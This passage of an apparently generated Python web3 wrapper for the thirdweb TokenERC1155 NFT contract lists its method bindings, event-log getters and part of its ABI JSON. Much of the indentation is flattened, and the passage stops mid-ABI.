        :param req: mint request struct to verify
        :param signature: signature over the mint request
        :param tx_params: transaction parameters
        """
        (req, signature) = self.validate_and_normalize_inputs(req, signature)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(req, signature).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        req: ITokenERC1155MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call.

        :param req: mint request struct to verify
        :param signature: signature over the mint request
        :param tx_params: transaction parameters
        """
        (req, signature) = self.validate_and_normalize_inputs(req, signature)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(req, signature).estimateGas(
            tx_params.as_dict()
        )
# pylint: disable=too-many-public-methods,too-many-instance-attributes
class TokenERC1155:
"""Wrapper class for TokenERC1155 Solidity contract.
All method parameters of type `bytes`:code: should be encoded as UTF-8,
which can be accomplished via `str.encode("utf_8")`:code:.
"""
default_admin_role: DefaultAdminRoleMethod
"""Constructor-initialized instance of
:class:`DefaultAdminRoleMethod`.
"""
balance_of: BalanceOfMethod
"""Constructor-initialized instance of
:class:`BalanceOfMethod`.
"""
balance_of_batch: BalanceOfBatchMethod
"""Constructor-initialized instance of
:class:`BalanceOfBatchMethod`.
"""
burn: BurnMethod
"""Constructor-initialized instance of
:class:`BurnMethod`.
"""
burn_batch: BurnBatchMethod
"""Constructor-initialized instance of
:class:`BurnBatchMethod`.
"""
contract_type: ContractTypeMethod
"""Constructor-initialized instance of
:class:`ContractTypeMethod`.
"""
contract_uri: ContractUriMethod
"""Constructor-initialized instance of
:class:`ContractUriMethod`.
"""
contract_version: ContractVersionMethod
"""Constructor-initialized instance of
:class:`ContractVersionMethod`.
"""
get_default_royalty_info: GetDefaultRoyaltyInfoMethod
"""Constructor-initialized instance of
:class:`GetDefaultRoyaltyInfoMethod`.
"""
get_platform_fee_info: GetPlatformFeeInfoMethod
"""Constructor-initialized instance of
:class:`GetPlatformFeeInfoMethod`.
"""
get_role_admin: GetRoleAdminMethod
"""Constructor-initialized instance of
:class:`GetRoleAdminMethod`.
"""
get_role_member: GetRoleMemberMethod
"""Constructor-initialized instance of
:class:`GetRoleMemberMethod`.
"""
get_role_member_count: GetRoleMemberCountMethod
"""Constructor-initialized instance of
:class:`GetRoleMemberCountMethod`.
"""
get_royalty_info_for_token: GetRoyaltyInfoForTokenMethod
"""Constructor-initialized instance of
:class:`GetRoyaltyInfoForTokenMethod`.
"""
grant_role: GrantRoleMethod
"""Constructor-initialized instance of
:class:`GrantRoleMethod`.
"""
has_role: HasRoleMethod
"""Constructor-initialized instance of
:class:`HasRoleMethod`.
"""
initialize: InitializeMethod
"""Constructor-initialized instance of
:class:`InitializeMethod`.
"""
is_approved_for_all: IsApprovedForAllMethod
"""Constructor-initialized instance of
:class:`IsApprovedForAllMethod`.
"""
is_trusted_forwarder: IsTrustedForwarderMethod
"""Constructor-initialized instance of
:class:`IsTrustedForwarderMethod`.
"""
mint_to: MintToMethod
"""Constructor-initialized instance of
:class:`MintToMethod`.
"""
mint_with_signature: MintWithSignatureMethod
"""Constructor-initialized instance of
:class:`MintWithSignatureMethod`.
"""
multicall: MulticallMethod
"""Constructor-initialized instance of
:class:`MulticallMethod`.
"""
name: NameMethod
"""Constructor-initialized instance of
:class:`NameMethod`.
"""
next_token_id_to_mint: NextTokenIdToMintMethod
"""Constructor-initialized instance of
:class:`NextTokenIdToMintMethod`.
"""
owner: OwnerMethod
"""Constructor-initialized instance of
:class:`OwnerMethod`.
"""
platform_fee_bps: PlatformFeeBpsMethod
"""Constructor-initialized instance of
:class:`PlatformFeeBpsMethod`.
"""
platform_fee_recipient: PlatformFeeRecipientMethod
"""Constructor-initialized instance of
:class:`PlatformFeeRecipientMethod`.
"""
primary_sale_recipient: PrimarySaleRecipientMethod
"""Constructor-initialized instance of
:class:`PrimarySaleRecipientMethod`.
"""
renounce_role: RenounceRoleMethod
"""Constructor-initialized instance of
:class:`RenounceRoleMethod`.
"""
revoke_role: RevokeRoleMethod
"""Constructor-initialized instance of
:class:`RevokeRoleMethod`.
"""
royalty_info: RoyaltyInfoMethod
"""Constructor-initialized instance of
:class:`RoyaltyInfoMethod`.
"""
safe_batch_transfer_from: SafeBatchTransferFromMethod
"""Constructor-initialized instance of
:class:`SafeBatchTransferFromMethod`.
"""
safe_transfer_from: SafeTransferFromMethod
"""Constructor-initialized instance of
:class:`SafeTransferFromMethod`.
"""
sale_recipient_for_token: SaleRecipientForTokenMethod
"""Constructor-initialized instance of
:class:`SaleRecipientForTokenMethod`.
"""
set_approval_for_all: SetApprovalForAllMethod
"""Constructor-initialized instance of
:class:`SetApprovalForAllMethod`.
"""
set_contract_uri: SetContractUriMethod
"""Constructor-initialized instance of
:class:`SetContractUriMethod`.
"""
set_default_royalty_info: SetDefaultRoyaltyInfoMethod
"""Constructor-initialized instance of
:class:`SetDefaultRoyaltyInfoMethod`.
"""
set_owner: SetOwnerMethod
"""Constructor-initialized instance of
:class:`SetOwnerMethod`.
"""
set_platform_fee_info: SetPlatformFeeInfoMethod
"""Constructor-initialized instance of
:class:`SetPlatformFeeInfoMethod`.
"""
set_primary_sale_recipient: SetPrimarySaleRecipientMethod
"""Constructor-initialized instance of
:class:`SetPrimarySaleRecipientMethod`.
"""
set_royalty_info_for_token: SetRoyaltyInfoForTokenMethod
"""Constructor-initialized instance of
:class:`SetRoyaltyInfoForTokenMethod`.
"""
supports_interface: SupportsInterfaceMethod
"""Constructor-initialized instance of
:class:`SupportsInterfaceMethod`.
"""
symbol: SymbolMethod
"""Constructor-initialized instance of
:class:`SymbolMethod`.
"""
thirdweb_fee: ThirdwebFeeMethod
"""Constructor-initialized instance of
:class:`ThirdwebFeeMethod`.
"""
total_supply: TotalSupplyMethod
"""Constructor-initialized instance of
:class:`TotalSupplyMethod`.
"""
uri: UriMethod
"""Constructor-initialized instance of
:class:`UriMethod`.
"""
verify: VerifyMethod
"""Constructor-initialized instance of
:class:`VerifyMethod`.
"""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
validator: TokenERC1155Validator = None,
):
"""Get an instance of wrapper for smart contract.
:param web3_or_provider: Either an instance of `web3.Web3`:code: or
`web3.providers.base.BaseProvider`:code:
:param contract_address: where the contract has been deployed
:param validator: for validation of method inputs.
"""
# pylint: disable=too-many-statements
self.contract_address = contract_address
if not validator:
validator = TokenERC1155Validator(
web3_or_provider, contract_address
)
web3 = None
if isinstance(web3_or_provider, BaseProvider):
web3 = Web3(web3_or_provider)
elif isinstance(web3_or_provider, Web3):
web3 = web3_or_provider
else:
raise TypeError(
"Expected parameter 'web3_or_provider' to be an instance of either"
+ " Web3 or BaseProvider"
)
# if any middleware was imported, inject it
try:
MIDDLEWARE
except NameError:
pass
else:
try:
for middleware in MIDDLEWARE:
web3.middleware_onion.inject(
middleware["function"],
layer=middleware["layer"],
)
except ValueError as value_error:
if value_error.args == (
"You can't add the same un-named instance twice",
):
pass
self._web3_eth = web3.eth
functions = self._web3_eth.contract(
address=to_checksum_address(contract_address),
abi=TokenERC1155.abi(),
).functions
self.default_admin_role = DefaultAdminRoleMethod(
web3_or_provider, contract_address, functions.DEFAULT_ADMIN_ROLE
)
self.balance_of = BalanceOfMethod(
web3_or_provider, contract_address, functions.balanceOf, validator
)
self.balance_of_batch = BalanceOfBatchMethod(
web3_or_provider,
contract_address,
functions.balanceOfBatch,
validator,
)
self.burn = BurnMethod(
web3_or_provider, contract_address, functions.burn, validator
)
self.burn_batch = BurnBatchMethod(
web3_or_provider, contract_address, functions.burnBatch, validator
)
self.contract_type = ContractTypeMethod(
web3_or_provider, contract_address, functions.contractType
)
self.contract_uri = ContractUriMethod(
web3_or_provider, contract_address, functions.contractURI
)
self.contract_version = ContractVersionMethod(
web3_or_provider, contract_address, functions.contractVersion
)
self.get_default_royalty_info = GetDefaultRoyaltyInfoMethod(
web3_or_provider, contract_address, functions.getDefaultRoyaltyInfo
)
self.get_platform_fee_info = GetPlatformFeeInfoMethod(
web3_or_provider, contract_address, functions.getPlatformFeeInfo
)
self.get_role_admin = GetRoleAdminMethod(
web3_or_provider,
contract_address,
functions.getRoleAdmin,
validator,
)
self.get_role_member = GetRoleMemberMethod(
web3_or_provider,
contract_address,
functions.getRoleMember,
validator,
)
self.get_role_member_count = GetRoleMemberCountMethod(
web3_or_provider,
contract_address,
functions.getRoleMemberCount,
validator,
)
self.get_royalty_info_for_token = GetRoyaltyInfoForTokenMethod(
web3_or_provider,
contract_address,
functions.getRoyaltyInfoForToken,
validator,
)
self.grant_role = GrantRoleMethod(
web3_or_provider, contract_address, functions.grantRole, validator
)
self.has_role = HasRoleMethod(
web3_or_provider, contract_address, functions.hasRole, validator
)
self.initialize = InitializeMethod(
web3_or_provider, contract_address, functions.initialize, validator
)
self.is_approved_for_all = IsApprovedForAllMethod(
web3_or_provider,
contract_address,
functions.isApprovedForAll,
validator,
)
self.is_trusted_forwarder = IsTrustedForwarderMethod(
web3_or_provider,
contract_address,
functions.isTrustedForwarder,
validator,
)
self.mint_to = MintToMethod(
web3_or_provider, contract_address, functions.mintTo, validator
)
self.mint_with_signature = MintWithSignatureMethod(
web3_or_provider,
contract_address,
functions.mintWithSignature,
validator,
)
self.multicall = MulticallMethod(
web3_or_provider, contract_address, functions.multicall, validator
)
self.name = NameMethod(
web3_or_provider, contract_address, functions.name
)
self.next_token_id_to_mint = NextTokenIdToMintMethod(
web3_or_provider, contract_address, functions.nextTokenIdToMint
)
self.owner = OwnerMethod(
web3_or_provider, contract_address, functions.owner
)
self.platform_fee_bps = PlatformFeeBpsMethod(
web3_or_provider, contract_address, functions.platformFeeBps
)
self.platform_fee_recipient = PlatformFeeRecipientMethod(
web3_or_provider, contract_address, functions.platformFeeRecipient
)
self.primary_sale_recipient = PrimarySaleRecipientMethod(
web3_or_provider, contract_address, functions.primarySaleRecipient
)
self.renounce_role = RenounceRoleMethod(
web3_or_provider,
contract_address,
functions.renounceRole,
validator,
)
self.revoke_role = RevokeRoleMethod(
web3_or_provider, contract_address, functions.revokeRole, validator
)
self.royalty_info = RoyaltyInfoMethod(
web3_or_provider,
contract_address,
functions.royaltyInfo,
validator,
)
self.safe_batch_transfer_from = SafeBatchTransferFromMethod(
web3_or_provider,
contract_address,
functions.safeBatchTransferFrom,
validator,
)
self.safe_transfer_from = SafeTransferFromMethod(
web3_or_provider,
contract_address,
functions.safeTransferFrom,
validator,
)
self.sale_recipient_for_token = SaleRecipientForTokenMethod(
web3_or_provider,
contract_address,
functions.saleRecipientForToken,
validator,
)
self.set_approval_for_all = SetApprovalForAllMethod(
web3_or_provider,
contract_address,
functions.setApprovalForAll,
validator,
)
self.set_contract_uri = SetContractUriMethod(
web3_or_provider,
contract_address,
functions.setContractURI,
validator,
)
self.set_default_royalty_info = SetDefaultRoyaltyInfoMethod(
web3_or_provider,
contract_address,
functions.setDefaultRoyaltyInfo,
validator,
)
self.set_owner = SetOwnerMethod(
web3_or_provider, contract_address, functions.setOwner, validator
)
self.set_platform_fee_info = SetPlatformFeeInfoMethod(
web3_or_provider,
contract_address,
functions.setPlatformFeeInfo,
validator,
)
self.set_primary_sale_recipient = SetPrimarySaleRecipientMethod(
web3_or_provider,
contract_address,
functions.setPrimarySaleRecipient,
validator,
)
self.set_royalty_info_for_token = SetRoyaltyInfoForTokenMethod(
web3_or_provider,
contract_address,
functions.setRoyaltyInfoForToken,
validator,
)
self.supports_interface = SupportsInterfaceMethod(
web3_or_provider,
contract_address,
functions.supportsInterface,
validator,
)
self.symbol = SymbolMethod(
web3_or_provider, contract_address, functions.symbol
)
self.thirdweb_fee = ThirdwebFeeMethod(
web3_or_provider, contract_address, functions.thirdwebFee
)
self.total_supply = TotalSupplyMethod(
web3_or_provider,
contract_address,
functions.totalSupply,
validator,
)
self.uri = UriMethod(
web3_or_provider, contract_address, functions.uri, validator
)
self.verify = VerifyMethod(
web3_or_provider, contract_address, functions.verify, validator
)
def get_approval_for_all_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for ApprovalForAll event.
:param tx_hash: hash of transaction emitting ApprovalForAll event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.ApprovalForAll()
.processReceipt(tx_receipt)
)
def get_default_royalty_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for DefaultRoyalty event.
:param tx_hash: hash of transaction emitting DefaultRoyalty event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.DefaultRoyalty()
.processReceipt(tx_receipt)
)
def get_owner_updated_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for OwnerUpdated event.
:param tx_hash: hash of transaction emitting OwnerUpdated event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.OwnerUpdated()
.processReceipt(tx_receipt)
)
def get_platform_fee_info_updated_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for PlatformFeeInfoUpdated event.
:param tx_hash: hash of transaction emitting PlatformFeeInfoUpdated
event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.PlatformFeeInfoUpdated()
.processReceipt(tx_receipt)
)
def get_primary_sale_recipient_updated_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for PrimarySaleRecipientUpdated event.
:param tx_hash: hash of transaction emitting
PrimarySaleRecipientUpdated event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.PrimarySaleRecipientUpdated()
.processReceipt(tx_receipt)
)
def get_role_admin_changed_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoleAdminChanged event.
:param tx_hash: hash of transaction emitting RoleAdminChanged event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.RoleAdminChanged()
.processReceipt(tx_receipt)
)
def get_role_granted_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoleGranted event.
:param tx_hash: hash of transaction emitting RoleGranted event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.RoleGranted()
.processReceipt(tx_receipt)
)
def get_role_revoked_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoleRevoked event.
:param tx_hash: hash of transaction emitting RoleRevoked event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.RoleRevoked()
.processReceipt(tx_receipt)
)
def get_royalty_for_token_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoyaltyForToken event.
:param tx_hash: hash of transaction emitting RoyaltyForToken event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.RoyaltyForToken()
.processReceipt(tx_receipt)
)
def get_tokens_minted_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for TokensMinted event.
:param tx_hash: hash of transaction emitting TokensMinted event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.TokensMinted()
.processReceipt(tx_receipt)
)
def get_tokens_minted_with_signature_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for TokensMintedWithSignature event.
:param tx_hash: hash of transaction emitting TokensMintedWithSignature
event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.TokensMintedWithSignature()
.processReceipt(tx_receipt)
)
def get_transfer_batch_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for TransferBatch event.
:param tx_hash: hash of transaction emitting TransferBatch event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.TransferBatch()
.processReceipt(tx_receipt)
)
def get_transfer_single_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for TransferSingle event.
:param tx_hash: hash of transaction emitting TransferSingle event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.TransferSingle()
.processReceipt(tx_receipt)
)
def get_uri_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for URI event.
:param tx_hash: hash of transaction emitting URI event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.URI()
.processReceipt(tx_receipt)
)
    @staticmethod
    def abi():
        """Return the ABI to the underlying contract.

        The complete TokenERC1155 ABI (events, views and mutators) is
        embedded below as a JSON literal and re-parsed on every call.
        """
        return json.loads(
            '[{"inputs":[{"internalType":"address","name":"_thirdwebFee","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"newRoyaltyRecipient","type":"address"},{"indexed":false,"internalType":"uint256","name":"newRoyaltyBps","type":"uint256"}],"name":"DefaultRoyalty","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"prevOwner","type":"address"},{"indexed":false,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnerUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"platformFeeRecipient","type":"address"},{"indexed":false,"internalType":"uint256","name":"platformFeeBps","type":"uint256"}],"name":"PlatformFeeInfoUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"recipient","type":"address"}],"name":"PrimarySaleRecipientUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"previousAdminRole","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"newAdminRole","type":"bytes32"}],"name":"RoleAdminChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleGranted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type
":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleRevoked","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"},{"indexed":false,"internalType":"address","name":"royaltyRecipient","type":"address"},{"indexed":false,"internalType":"uint256","name":"royaltyBps","type":"uint256"}],"name":"RoyaltyForToken","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"mintedTo","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenIdMinted","type":"uint256"},{"indexed":false,"internalType":"string","name":"uri","type":"string"},{"indexed":false,"internalType":"uint256","name":"quantityMinted","type":"uint256"}],"name":"TokensMinted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"signer","type":"address"},{"indexed":true,"internalType":"address","name":"mintedTo","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenIdMinted","type":"uint256"},{"components":[{"internalType":"address","name":"to","type":"address"},{"internalType":"address","name":"royaltyRecipient","type":"address"},{"internalType":"uint256","name":"royaltyBps","type":"uint256"},{"internalType":"address","name":"primarySaleRecipient","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"string","name":"uri","type":"string"},{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"uint256","name":"pricePerToken","type":"uint256"},{"internalType":"address","name":"currency","type":"address"},{"internalType":"uint128","name":"validityStartTimestamp","type":"uint128"},{"internalType":"uint128","name":"validityEndTimestamp","type":"uint128"},{"internalType":"bytes32","name":"uid","type":"bytes32"}],"indexed":false,"internalType":"struct 
ITokenERC1155.MintRequest","name":"mintRequest","type":"tuple"}],"name":"TokensMintedWithSignature","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256[]","name":"ids","type":"uint256[]"},{"indexed":false,"internalType":"uint256[]","name":"values","type":"uint256[]"}],"name":"TransferBatch","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"id","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"TransferSingle","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"string","name":"value","type":"string"},{"indexed":true,"internalType":"uint256","name":"id","type":"uint256"}],"name":"URI","type":"event"},{"inputs":[],"name":"DEFAULT_ADMIN_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"id","type":"uint256"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"accounts","type":"address[]"},{"internalType":"uint256[]","name":"ids","type":"uint256[]"}],"name":"balanceOfBatch","outputs":[{"internalType":"uint256[]","name":"","type":"uint256[]"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"id",
"type":"uint256"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256[]","name":"ids","type":"uint256[]"},{"internalType":"uint256[]","name":"values","type":"uint256[]"}],"name":"burnBatch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"contractType","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"contractVersion","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"getDefaultRoyaltyInfo","outputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getPlatformFeeInfo","outputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleAdmin","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"getRoleMember","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleMemberCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId
","type":"uint256"}],"name":"getRoyaltyInfoForToken","outputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"grantRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"hasRole","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_defaultAdmin","type":"address"},{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"string","name":"_contractURI","type":"string"},{"internalType":"address[]","name":"_trustedForwarders","type":"address[]"},{"internalType":"address","name":"_primarySaleRecipient","type":"address"},{"internalType":"address","name":"_royaltyRecipient","type":"address"},{"internalType":"uint128","name":"_royaltyBps","type":"uint128"},{"internalType":"uint128","name":"_platformFeeBps","type":"uint128"},{"internalType":"address","name":"_platformFeeRecipient","type":"address"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"forwarder","type":"address"}],"name":"isTrustedForwarder","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_to","type":"address"},{"inter
nalType":"uint256","name":"_tokenId","type":"uint256"},{"internalType":"string","name":"_uri","type":"string"},{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"mintTo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"components":[{"internalType":"address","name":"to","type":"address"},{"internalType":"address","name":"royaltyRecipient","type":"address"},{"internalType":"uint256","name":"royaltyBps","type":"uint256"},{"internalType":"address","name":"primarySaleRecipient","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"string","name":"uri","type":"string"},{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"uint256","name":"pricePerToken","type":"uint256"},{"internalType":"address","name":"currency","type":"address"},{"internalType":"uint128","name":"validityStartTimestamp","type":"uint128"},{"internalType":"uint128","name":"validityEndTimestamp","type":"uint128"},{"internalType":"bytes32","name":"uid","type":"bytes32"}],"internalType":"struct 
ITokenERC1155.MintRequest","name":"_req","type":"tuple"},{"internalType":"bytes","name":"_signature","type":"bytes"}],"name":"mintWithSignature","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"bytes[]","name":"data","type":"bytes[]"}],"name":"multicall","outputs":[{"internalType":"bytes[]","name":"results","type":"bytes[]"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"nextTokenIdToMint","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"platformFeeBps","outputs":[{"internalType":"uint128","name":"","type":"uint128"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"platformFeeRecipient","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"primarySaleRecipient","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"renounceRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"revokeRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"uint256","name":"salePrice","type":"uint256"}],"name":"royaltyInfo","outputs":[{"internalType":"address","name":"receiver","type":"address"},{"internalType":"uint256","name":"royaltyAmount
